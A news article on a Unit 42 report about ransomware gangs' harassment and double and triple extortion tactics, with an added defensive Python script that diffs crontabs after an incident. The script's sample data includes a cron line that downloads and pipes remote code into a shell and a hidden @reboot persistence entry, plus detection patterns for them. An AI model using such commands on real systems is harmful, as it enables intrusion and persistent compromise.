Ransomware gangs are becoming increasingly assertive and aggressive in their approaches to victims, resorting to high-pressure tactics including campaigns of targeted harassment to extort money, even from those that have paid attention to ransomware prevention and maintain backups of their data.
This is according to a report published today by Palo Alto Networks’ Unit 42 incident response and threat intelligence department. The data – which is drawn only from cases responded to by Unit 42, so is by no means a full or wholly accurate assessment of activity volumes – found that ransomware gangs used harassment as a tactic 20 times more often last year than they did in 2021.
Typically, harassment in a ransomware case is aimed at a specific individual, often in a leadership role at a victim organisation or its customers. It involves a series of increasingly aggressive phone calls and emails to pressure them into paying a ransom, or to pressure customers into pressurising those who are empowered to pay a ransom to do so. It may also involve cyber criminals spreading word about the attack on social media or reaching out to technology journalists.
This is on top of existing layered extortion techniques, which, besides encryption of data, include data exfiltration and leakage – seen in 70% of attacks last year, up by 30% on 2021 – and distributed denial of service (DDoS) attacks – seen in around 2% of ransomware incidents. These trends, referred to as double and triple extortion, have become well established since 2020.
“Ransomware and extortion groups are forcing their victims into a pressure cooker, with the ultimate goal of increasing their chances of getting paid,” said Wendi Whitmore, senior vice-president and head of Unit 42 at Palo Alto Networks.
“Harassment has been involved in one of every five ransomware cases we’ve investigated recently, showing the lengths these groups are willing to go to coerce a payday. Many are going so far as to leverage customer information that has been stolen to harass them and try to force the organisation’s hand into payment.”
Unit 42’s researchers join a growing number of voices who believe that these trends demonstrate how backups – long held to be the cornerstone of any half-decent ransomware-prevention strategy – are no longer effective in guarding against the impact, in and of themselves.
While keeping up-to-date, offline and regularly tested backups remains a vital safeguard, Unit 42 found that double and triple extortion techniques have become so effective that ransomware gangs are still able to coerce their victims into paying even if the data is backed up and protected, and operational disruption is minimised.
Often, the researchers said, the mere threat of sensitive data being publicly exposed, the ensuing reputational damage and loss of confidence, and the threat of fines from regulators – none of which can be prevented by maintaining backups – is enough to force a victim to back down.
Indeed, Unit 42 said it had worked on a number of incidents in which victims had initially refused to countenance the idea of paying a ransom because their backups were in good order, but were then subjected to such intense harassment that the resulting costs exceeded the ransomware demand. LockBit negotiators used this possibility as a threat when trying to extort Royal Mail earlier this year, although the postal service ultimately stood its ground.
If they have not already done so, Unit 42 recommends security leaders prepare an enhanced playbook to deal with more sophisticated extortion campaigns.
Such a playbook should include a comprehensive incident response plan and corresponding crisis communications protocols, and should establish a chain of command setting out which stakeholders should be involved and who is empowered to do what – for example, who negotiates, who is authorised to sign off on a payment should it come to that, and so on.
The plan should also cover what employees should do – or avoid doing – if they are subjected to telephone or email harassment during an incident. Harassment training should be delivered to staff to better equip them in this regard.
Security leaders should also make sure they are able to conduct post-mortem compromise assessments to validate that any backdoors or other indicators of compromise (IoCs), such as scheduled tasks or jobs, are removed to make follow-on attacks less likely.
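The post-mortem compromise assessment described above is usually a baseline comparison: an inventory of scheduled tasks or jobs captured before the incident is compared with the inventory captured after remediation, and anything new is reviewed. The following is an added example written for this article, not code from Unit 42 or Palo Alto Networks; it uses Linux system crontab format as the concrete case of "scheduled tasks or jobs", and assumes the team holds a pre-incident export of the crontab (the baseline and post-remediation crontabs below are constructed sample data, with an RFC 5737 documentation address standing in for any real host). Entries absent from the baseline are reported, and each is annotated with simple risk indicators (runs at boot, lives in a world-writable directory, hidden path component, fetches remote content, pipes content into an interpreter) so reviewers can prioritise, while still seeing benign-looking additions that also need sign-off.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample: crontab exported before the incident (assumed to exist).
BASELINE_CRONTAB = """\
# m h dom mon dow user command
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
0 2 * * * root /usr/local/bin/backup.sh --full
*/15 * * * * root /usr/local/bin/healthcheck.sh
30 3 * * 0 postgres /usr/bin/vacuumdb --all
"""

# Constructed sample: crontab captured during the post-mortem assessment.
# 203.0.113.10 is a documentation-range address, not a real host.
CURRENT_CRONTAB = """\
# m h dom mon dow user command
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
0 2 * * * root /usr/local/bin/backup.sh --full
*/15 * * * * root /usr/local/bin/healthcheck.sh
30 3 * * 0 postgres /usr/bin/vacuumdb --all
*/5 * * * * root /bin/sh -c "curl -s http://203.0.113.10/u | sh"
@reboot root /dev/shm/.cache/svc
0 4 * * * root /usr/local/bin/logrotate-extra.sh
"""


@dataclass(frozen=True)
class CronEntry:
    schedule: str
    user: Optional[str]
    command: str
    raw: str

    def key(self):
        # Identity used for the baseline comparison; the raw line is kept for reporting.
        return (self.schedule, self.user, self.command)


def parse_crontab(text: str, system_format: bool = True) -> List[CronEntry]:
    """Parse crontab text. system_format=True expects a user field (/etc/crontab style)."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        tokens = line.split()
        if "=" in tokens[0] and not tokens[0].startswith("@"):
            continue  # environment assignment such as PATH=... or MAILTO=...
        n_sched = 1 if tokens[0].startswith("@") else 5  # @reboot etc. are one token
        n_fixed = n_sched + (1 if system_format else 0)
        if len(tokens) <= n_fixed:
            continue  # malformed line; a real assessment would log it for manual review
        schedule = " ".join(tokens[:n_sched])
        user = tokens[n_sched] if system_format else None
        command = line.split(None, n_fixed)[n_fixed]  # keep the command's own spacing
        entries.append(CronEntry(schedule, user, command, raw))
    return entries


def risk_indicators(entry: CronEntry) -> List[str]:
    """Heuristic labels that help prioritise review; absence of labels is not a clean bill."""
    cmd = entry.command
    found = []
    if entry.schedule == "@reboot":
        found.append("runs at boot")
    if re.search(r"(^|[\s\"'=])(/tmp|/var/tmp|/dev/shm)(/|[\s\"']|$)", cmd):
        found.append("command in world-writable directory")
    if re.search(r"/\.[^/\s.]", cmd):
        found.append("hidden path component")
    if re.search(r"\b(curl|wget)\b", cmd):
        found.append("fetches remote content")
    if re.search(r"\|\s*(sh|bash|dash|zsh|python[0-9.]*|perl)\b", cmd):
        found.append("pipes content into an interpreter")
    return found


def assess(baseline_text: str, current_text: str, system_format: bool = True) -> List[dict]:
    """Return every current entry not present in the baseline, with its indicators."""
    known = {e.key() for e in parse_crontab(baseline_text, system_format)}
    findings = []
    for entry in parse_crontab(current_text, system_format):
        if entry.key() not in known:
            findings.append({"entry": entry.raw, "indicators": risk_indicators(entry)})
    return findings


if __name__ == "__main__":
    for finding in assess(BASELINE_CRONTAB, CURRENT_CRONTAB):
        flags = ", ".join(finding["indicators"]) or "no indicators (still needs sign-off)"
        print(f"UNEXPECTED: {finding['entry']}\n    -> {flags}")
```

The same shape applies to other persistence stores named in the article's recommendation (Windows scheduled tasks exported from Task Scheduler, systemd timers, at jobs): capture an inventory before the incident, capture it again after remediation, diff the two, and treat every unexplained addition as an open finding until an owner vouches for it.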
Unit 42’s researchers said that over the coming nine months, we will likely see a rise in extortion linked to insider threats, politically motivated extortion attempts, and the use of ransomware and extortion to distract from attacks aimed at compromising the victim’s supply chain – or, in the case of tech companies, their source code. The team also predicted that we will see a “large cloud ransomware compromise” in the near future.